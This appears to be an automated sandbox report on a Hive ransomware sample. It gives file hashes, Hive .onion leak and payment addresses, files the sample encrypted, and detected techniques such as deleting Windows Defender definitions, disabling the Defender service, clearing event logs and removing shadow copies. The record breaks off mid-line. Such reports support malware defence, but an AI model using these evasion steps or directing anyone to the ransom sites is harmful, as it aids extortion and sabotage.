Analysis
-
max time kernel
122s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
22-11-2021 11:03
Static task
static1
Behavioral task
behavioral1
Sample
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
Resource
win10-en-20211014
General
-
Target
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
-
Size
3.3MB
-
MD5
0ab044581b75da84b0e929590638095e
-
SHA1
1e907df240eadb3d27d145d50da9025d524728fd
-
SHA256
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042
-
SHA512
168120b07437e3e6664128f0e23f6792b714d3ffa41131f7027099c0a5bd2dc0b538dd53fedb4cfadbcb9ea07ebae75c67b0e8bd2c6054aa991a3bdf8e42dbb7
Malware Config
Extracted
C:\Program Files\7-Zip\etrU_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2056 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1904 bcdedit.exe 816 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_iYDvqmxXpKo0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_vLO8wFan5-Y0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_YjTeSzooVr40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18248_.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Zm7uFuxIBlo0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMCCore.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\calendar.css 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AtNTsYlVR-80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_eIuFCqQwxuE0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_n-kWE_CsgP00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_ciKQZpADwDM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AkOCIFaqZso0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_j3xSau2AAKg0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_BzspYawFMsk0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_iM964rekonc0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_ZfEQ8wAQmD00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_zhWJDcAgThA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_L2q4JQ887M00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b__hPogyV-bk00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\RSSFeeds.js 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\ExportRequest.jtx.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_JHA5KFd5Uks0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\FormatExit.htm.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_vAMrbCS2H9c0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_y91XdBH9x2Q0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_yHHTJK5etN40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_p-onbgsTrhw0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBORDER.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_M-l66Raxg9k0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Whwy7Ij88To0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_TdY6B5Q-px40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_TuNtkB8Bpio0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdate.cer.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_hidwED7GGYM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_6YC1WsxzmAA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_40QimrYSuMI0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Media Player\en-US\WMPDMCCore.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Dw99rLnslfM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_d-WpmdNGC4U0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Id2Y5OcE0XI0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_underline.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_-3QSW2PoYf80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AGh4x-vVTLE0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_VV14SG4Az-40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_T3sG3EhKcGM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_BnSxLZ4oWq80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21316_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_7BH0LOIAz1Y0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_LMxKzus3Udc0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_gvcoLT7BeI80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_JQm8MYwKZv00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_0ewA-9WimiA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_PXQShX9tA8A0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN096.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_qObKfptyr6o0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\wmplayer.exe.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1688 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2428 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exepid process 2088 powershell.exe 2176 powershell.exe 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1460 wevtutil.exe Token: SeBackupPrivilege 1460 wevtutil.exe Token: SeSecurityPrivilege 668 wevtutil.exe Token: SeBackupPrivilege 668 wevtutil.exe Token: SeSecurityPrivilege 924 wevtutil.exe Token: SeBackupPrivilege 924 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1704 wmic.exe Token: SeSecurityPrivilege 1704 wmic.exe Token: SeTakeOwnershipPrivilege 1704 wmic.exe Token: SeLoadDriverPrivilege 1704 wmic.exe Token: SeSystemProfilePrivilege 1704 wmic.exe Token: SeSystemtimePrivilege 1704 wmic.exe Token: SeProfSingleProcessPrivilege 1704 wmic.exe Token: SeIncBasePriorityPrivilege 1704 wmic.exe Token: SeCreatePagefilePrivilege 1704 wmic.exe Token: SeBackupPrivilege 1704 wmic.exe Token: SeRestorePrivilege 1704 wmic.exe Token: SeShutdownPrivilege 1704 wmic.exe Token: SeDebugPrivilege 1704 wmic.exe Token: SeSystemEnvironmentPrivilege 1704 wmic.exe Token: SeRemoteShutdownPrivilege 1704 wmic.exe Token: SeUndockPrivilege 1704 wmic.exe Token: SeManageVolumePrivilege 1704 wmic.exe Token: 33 1704 wmic.exe Token: 34 1704 wmic.exe Token: 35 1704 wmic.exe Token: SeIncreaseQuotaPrivilege 1384 wmic.exe Token: SeSecurityPrivilege 1384 wmic.exe Token: SeTakeOwnershipPrivilege 1384 wmic.exe Token: SeLoadDriverPrivilege 1384 wmic.exe Token: SeSystemProfilePrivilege 1384 wmic.exe Token: SeSystemtimePrivilege 1384 wmic.exe Token: SeProfSingleProcessPrivilege 1384 wmic.exe Token: SeIncBasePriorityPrivilege 1384 wmic.exe Token: SeCreatePagefilePrivilege 1384 wmic.exe Token: SeBackupPrivilege 1384 wmic.exe Token: SeRestorePrivilege 1384 wmic.exe Token: SeShutdownPrivilege 1384 wmic.exe Token: SeDebugPrivilege 1384 wmic.exe Token: SeSystemEnvironmentPrivilege 1384 wmic.exe Token: SeRemoteShutdownPrivilege 1384 wmic.exe Token: SeUndockPrivilege 1384 wmic.exe Token: SeManageVolumePrivilege 1384 wmic.exe Token: 33 1384 wmic.exe Token: 34 1384 wmic.exe Token: 35 1384 wmic.exe Token: SeIncreaseQuotaPrivilege 1384 wmic.exe Token: SeSecurityPrivilege 1384 wmic.exe Token: SeTakeOwnershipPrivilege 1384 wmic.exe Token: SeLoadDriverPrivilege 1384 wmic.exe Token: SeSystemProfilePrivilege 1384 wmic.exe Token: SeSystemtimePrivilege 1384 wmic.exe Token: SeProfSingleProcessPrivilege 1384 wmic.exe Token: SeIncBasePriorityPrivilege 1384 wmic.exe Token: SeCreatePagefilePrivilege 1384 wmic.exe Token: SeBackupPrivilege 1384 wmic.exe Token: SeRestorePrivilege 1384 wmic.exe Token: SeShutdownPrivilege 1384 wmic.exe Token: SeDebugPrivilege 1384 wmic.exe Token: SeSystemEnvironmentPrivilege 1384 wmic.exe Token: SeRemoteShutdownPrivilege 1384 wmic.exe Token: SeUndockPrivilege 1384 wmic.exe Token: SeManageVolumePrivilege 1384 wmic.exe Token: 33 1384 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 536 wrote to memory of 1604 536 net.exe net1.exe PID 536 wrote to memory of 1604 536 net.exe net1.exe PID 536 wrote to memory of 1604 536 net.exe net1.exe PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1220 wrote to memory of 1172 1220 net.exe net1.exe PID 1220 wrote to memory of 1172 1220 net.exe net1.exe PID 1220 wrote to memory of 1172 1220 net.exe net1.exe PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1132 wrote to memory of 1996 1132 net.exe net1.exe PID 1132 wrote to memory of 1996 1132 net.exe net1.exe PID 1132 wrote to memory of 1996 1132 net.exe net1.exe PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 392 wrote to memory of 1672 392 net.exe net1.exe PID 392 wrote to memory of 1672 392 net.exe net1.exe PID 392 wrote to memory of 1672 392 net.exe net1.exe PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1800 wrote to memory of 1700 1800 net.exe net1.exe PID 1800 wrote to memory of 1700 1800 net.exe net1.exe PID 1800 wrote to memory of 1700 1800 net.exe net1.exe PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1476 wrote to memory of 1912 1476 net.exe net1.exe PID 1476 wrote to memory of 1912 1476 net.exe net1.exe PID 1476 wrote to memory of 1912 1476 net.exe net1.exe PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1440 wrote to memory of 1684 1440 net.exe net1.exe PID 1440 wrote to memory of 1684 1440 net.exe net1.exe PID 1440 wrote to memory of 1684 1440 net.exe net1.exe PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe net.exe PID 1204 wrote to memory of 1184 1204 net.exe net1.exe PID 1204 wrote to memory of 1184 1204 net.exe net1.exe PID 1204 wrote to memory of 1184 1204 net.exe net1.exe PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1420 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1420 1520 